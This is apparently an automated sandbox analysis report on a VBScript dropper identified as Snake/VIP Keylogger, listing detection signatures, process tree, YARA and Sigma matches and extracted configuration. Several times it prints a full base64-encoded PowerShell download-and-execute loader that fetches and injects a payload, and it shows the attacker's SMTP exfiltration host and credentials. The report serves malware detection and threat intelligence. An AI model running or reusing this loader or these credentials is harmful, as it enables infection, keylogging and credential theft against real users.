Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jjmax il.vbs

Overview

General Information

Sample name:jjmax il.vbs
Analysis ID:1617738
MD5:f545e8be6220242acf3b735f153d0650
SHA1:bf5df9d7432b38159c1ca101e1df8c292cedcac0
SHA256:1817a7661c198619d6cedcaf58cdaa63f3195551edb1597f4c3c3497799d42d7
Tags:vbsuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: MSBuild connects to smtp port
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Connects to a pastebin service (likely for C&C)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Potential malicious VBS script found (suspicious strings)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6416 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\jjmax il.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6140 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABhAGQAagBvAHUAcgBuAG0AZQBuAHQAIAA9ACAAJwAwAC8AbQBtAFkAWABSAHkAWABRAC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAJwA7ACQAcABlAG4AdABhAGQAaQBjACAAPQAgACQAYQBkAGoAbwB1AHIAbgBtAGUAbgB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABmAGEAcgBhAGQAaQB6AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMwAwADAANQAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AbgBJAHgAXwA1AFQAMABMAHgASABPAEIAagBpAGwATgBiADkAQwBSAHYAaQBhAGIAUABqAHIAVwAyAGQAbABDAC0ATAB4AGUATwBkAEoAUABGAF8AWgBfADEATQBQADYAQwB1AFEAQgBTADUASwBjAHAAdABBACYAcABrAF8AdgBpAGQAPQAzADQAMgA4ADAAMwBkADEAYwBjADQAZQAzAGIAOAAwADEANwAzADkAMwA1ADkAMgAwADMAYgA1AGYAZQA5AGQAJwA7ACQAZQBvAGwAaQBhAG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwBhAHIAbwB0AGkAYwAgAD0AIAAkAGUAbwBsAGkAYQBuAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGYAYQByAGEAZABpAHoAZQApADsAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGMAYQByAG8AdABpAGMAKQA7ACQAbABhAHUAbgBkAGUAcgBlAHIAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAHMAZQBtAGkAcABoAHkAbABsAGkAZABpAGEAbgAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABsAGEAdQBuAGQAZQByAGUAcgApADsAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABzAGUAbQBpAHAAaAB5AGwAbABpAGQAaQBhAG4AKQA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGYAcgBhAGMAdABpAG8AbgBhAHQAaQBuAGcAIAAtAGcAdAAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgACsAPQAgACQAbABhAHUAbgBkAGUAcgBlAHIALgBMAGUAbgBnAHQAaAA7ACQAcwBoAGUAZQByAGwAZQBzAHMAIAA9ACAAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAALQAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAZwBuAGEAcgBsAGkAZQBzAHQAIAA9ACAAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACwAIAAkAHMAaABlAGUAcgBsAGUAcwBzACkAOwAkAHAAaQBsAHAAdQBsAGkAcwB0AGkAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABnAG4AYQByAGwAaQBlAHMAdAApADsAJABsAG8AYwB1AHMAdABpAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAcABpAGwAcAB1AGwAaQBzAHQAaQBjACkAOwAkAFYAZQBsAHUAdwBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcABlAG4AdABhAGQAaQBjACwAJwAnACwAJwAnACwAJwAnACwAJwBNAFMAQgB1AGkAbABkACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcAKQApAA==')) | Invoke-Expression" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 7396 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • MSBuild.exe (PID: 7424 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "jjmaxcolrlone@interelub.com", "Password": "!YxP!%1gFh=G", "Host": "turkey.ipchina163.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "jjmaxcolrlone@interelub.com", "Password": "!YxP!%1gFh=G", "Host": "turkey.ipchina163.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2e112:$a1: get_encryptedPassword
        • 0x2e43b:$a2: get_encryptedUsername
        • 0x2df22:$a3: get_timePasswordChanged
        • 0x2e02b:$a4: get_passwordField
        • 0x2e128:$a5: set_encryptedPassword
        • 0x2f810:$a7: get_logins
        • 0x2f773:$a10: KeyLoggerEventArgs
        • 0x2f3d8:$a11: KeyLoggerEventArgsEventHandler
        0000000B.00000002.2554364228.00000000031E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 18 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          2.2.powershell.exe.1f5dc50d150.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.2.powershell.exe.1f5dc50d150.7.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              2.2.powershell.exe.1f5dc50d150.7.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                2.2.powershell.exe.1f5dc50d150.7.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2c512:$a1: get_encryptedPassword
                • 0x2c83b:$a2: get_encryptedUsername
                • 0x2c322:$a3: get_timePasswordChanged
                • 0x2c42b:$a4: get_passwordField
                • 0x2c528:$a5: set_encryptedPassword
                • 0x2dc10:$a7: get_logins
                • 0x2db73:$a10: KeyLoggerEventArgs
                • 0x2d7d8:$a11: KeyLoggerEventArgsEventHandler
                2.2.powershell.exe.1f5dc50d150.7.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3a28a:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x3992d:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x39b8a:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3a569:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 17 entries

                Other

                SourceRuleDescriptionAuthorStrings
                amsi64_6140.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                  Sigma Signatures

                  Networking

                  barindex
                  Sigma detected: MSBuild connects to smtp port
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 111.90.142.170, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7424, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49844

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABhAGQAagBvAHUAcgBuAG0AZQBuAHQAIAA9ACAAJwAwAC8AbQBtAFkAWABSAHkAWABRAC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAJwA7ACQAcABlAG4AdABhAGQAaQBjACAAPQAgACQAYQBkAGoAbwB1AHIAbgBtAGUAbgB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABmAGEAcgBhAGQAaQB6AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMwAwADAANQAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AbgBJAHgAXwA1AFQAMABMAHgASABPAEIAagBpAGwATgBiADkAQwBSAHYAaQBhAGIAUABqAHIAVwAyAGQAbABDAC0ATAB4AGUATwBkAEoAUABGAF8AWgBfADEATQBQADYAQwB1AFEAQgBTADUASwBjAHAAdABBACYAcABrAF8AdgBpAGQAPQAzADQAMgA4ADAAMwBkADEAYwBjADQAZQAzAGIAOAAwADEANwAzADkAMwA1ADkAMgAwADMAYgA1AGYAZQA5AGQAJwA7ACQAZQBvAGwAaQBhAG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwBhAHIAbwB0AGkAYwAgAD0AIAAkAGUAbwBsAGkAYQBuAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGYAYQByAGEAZABpAHoAZQApADsAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGMAYQByAG8AdABpAGMAKQA7ACQAbABhAHUAbgBkAGUAcgBlAHIAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAHMAZQBtAGkAcABoAHkAbABsAGkAZABpAGEAbgAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABsAGEAdQBuAGQAZQByAGUAcgApADsAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABzAGUAbQBpAHAAaAB5AGwAbABpAGQAaQBhAG4AKQA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGYAcgBhAGMAdABpAG8AbgBhAHQAaQBuAGcAIAAtAGcAdAAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgACsAPQAgACQAbABhAHUAbgBkAGUAcgBlAHIALgBMAGUAbgBnAHQAaAA7ACQAcwBoAGUAZQByAGwAZQBzAHMAIAA9ACAAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAALQAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAZwBuAGEAcgBsAGkAZQBzAHQAIAA9ACAAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACwAIAAkAHMAaABlAGUAcgBsAGUAcwBzACkAOwAkAHAAaQBsAHAAdQBsAGkAcwB0AGkAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABnAG4AYQByAGwAaQBlAHMAdAApADsAJABsAG8AYwB1AHMAdABpAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAcABpAGwAcAB1AGwAaQBzAHQAaQBjACkAOwAkAFYAZQBsAHUAdwBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcABlAG4AdABhAGQAaQBjACwAJwAnACwAJwAnACwAJwAnACwAJwBNAFMAQgB1AGkAbABkACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcAKQApAA==')) | Invoke-Expression", CommandLine: "C
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABhAGQAagBvAHUAcgBuAG0AZQBuAHQAIAA9ACAAJwAwAC8AbQBtAFkAWABSAHkAWABRAC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAJwA7ACQAcABlAG4AdABhAGQAaQBjACAAPQAgACQAYQBkAGoAbwB1AHIAbgBtAGUAbgB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABmAGEAcgBhAGQAaQB6AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMwAwADAANQAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AbgBJAHgAXwA1AFQAMABMAHgASABPAEIAagBpAGwATgBiADkAQwBSAHYAaQBhAGIAUABqAHIAVwAyAGQAbABDAC0ATAB4AGUATwBkAEoAUABGAF8AWgBfADEATQBQADYAQwB1AFEAQgBTADUASwBjAHAAdABBACYAcABrAF8AdgBpAGQAPQAzADQAMgA4ADAAMwBkADEAYwBjADQAZQAzAGIAOAAwADEANwAzADkAMwA1ADkAMgAwADMAYgA1AGYAZQA5AGQAJwA7ACQAZQBvAGwAaQBhAG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwBhAHIAbwB0AGkAYwAgAD0AIAAkAGUAbwBsAGkAYQBuAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGYAYQByAGEAZABpAHoAZQApADsAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGMAYQByAG8AdABpAGMAKQA7ACQAbABhAHUAbgBkAGUAcgBlAHIAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAHMAZQBtAGkAcABoAHkAbABsAGkAZABpAGEAbgAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABsAGEAdQBuAGQAZQByAGUAcgApADsAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABzAGUAbQBpAHAAaAB5AGwAbABpAGQAaQBhAG4AKQA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGYAcgBhAGMAdABpAG8AbgBhAHQAaQBuAGcAIAAtAGcAdAAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgACsAPQAgACQAbABhAHUAbgBkAGUAcgBlAHIALgBMAGUAbgBnAHQAaAA7ACQAcwBoAGUAZQByAGwAZQBzAHMAIAA9ACAAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAALQAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAZwBuAGEAcgBsAGkAZQBzAHQAIAA9ACAAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACwAIAAkAHMAaABlAGUAcgBsAGUAcwBzACkAOwAkAHAAaQBsAHAAdQBsAGkAcwB0AGkAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABnAG4AYQByAGwAaQBlAHMAdAApADsAJABsAG8AYwB1AHMAdABpAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAcABpAGwAcAB1AGwAaQBzAHQAaQBjACkAOwAkAFYAZQBsAHUAdwBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcABlAG4AdABhAGQAaQBjACwAJwAnACwAJwAnACwAJwAnACwAJwBNAFMAQgB1AGkAbABkACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcAKQApAA==')) | Invoke-Expression", CommandLine: "C
                  Sigma detected: Silenttrinity Stager Msbuild Activity
                  Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 132.226.8.169, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7424, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49707
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\jjmax il.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\jjmax il.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\jjmax il.vbs", ProcessId: 6416, ProcessName: wscript.exe
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\jjmax il.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\jjmax il.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\jjmax il.vbs", ProcessId: 6416, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABhAGQAagBvAHUAcgBuAG0AZQBuAHQAIAA9ACAAJwAwAC8AbQBtAFkAWABSAHkAWABRAC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAJwA7ACQAcABlAG4AdABhAGQAaQBjACAAPQAgACQAYQBkAGoAbwB1AHIAbgBtAGUAbgB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABmAGEAcgBhAGQAaQB6AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMwAwADAANQAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AbgBJAHgAXwA1AFQAMABMAHgASABPAEIAagBpAGwATgBiADkAQwBSAHYAaQBhAGIAUABqAHIAVwAyAGQAbABDAC0ATAB4AGUATwBkAEoAUABGAF8AWgBfADEATQBQADYAQwB1AFEAQgBTADUASwBjAHAAdABBACYAcABrAF8AdgBpAGQAPQAzADQAMgA4ADAAMwBkADEAYwBjADQAZQAzAGIAOAAwADEANwAzADkAMwA1ADkAMgAwADMAYgA1AGYAZQA5AGQAJwA7ACQAZQBvAGwAaQBhAG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwBhAHIAbwB0AGkAYwAgAD0AIAAkAGUAbwBsAGkAYQBuAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGYAYQByAGEAZABpAHoAZQApADsAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGMAYQByAG8AdABpAGMAKQA7ACQAbABhAHUAbgBkAGUAcgBlAHIAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAHMAZQBtAGkAcABoAHkAbABsAGkAZABpAGEAbgAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABsAGEAdQBuAGQAZQByAGUAcgApADsAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABzAGUAbQBpAHAAaAB5AGwAbABpAGQAaQBhAG4AKQA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGYAcgBhAGMAdABpAG8AbgBhAHQAaQBuAGcAIAAtAGcAdAAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgACsAPQAgACQAbABhAHUAbgBkAGUAcgBlAHIALgBMAGUAbgBnAHQAaAA7ACQAcwBoAGUAZQByAGwAZQBzAHMAIAA9ACAAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAALQAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAZwBuAGEAcgBsAGkAZQBzAHQAIAA9ACAAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAuAFMAd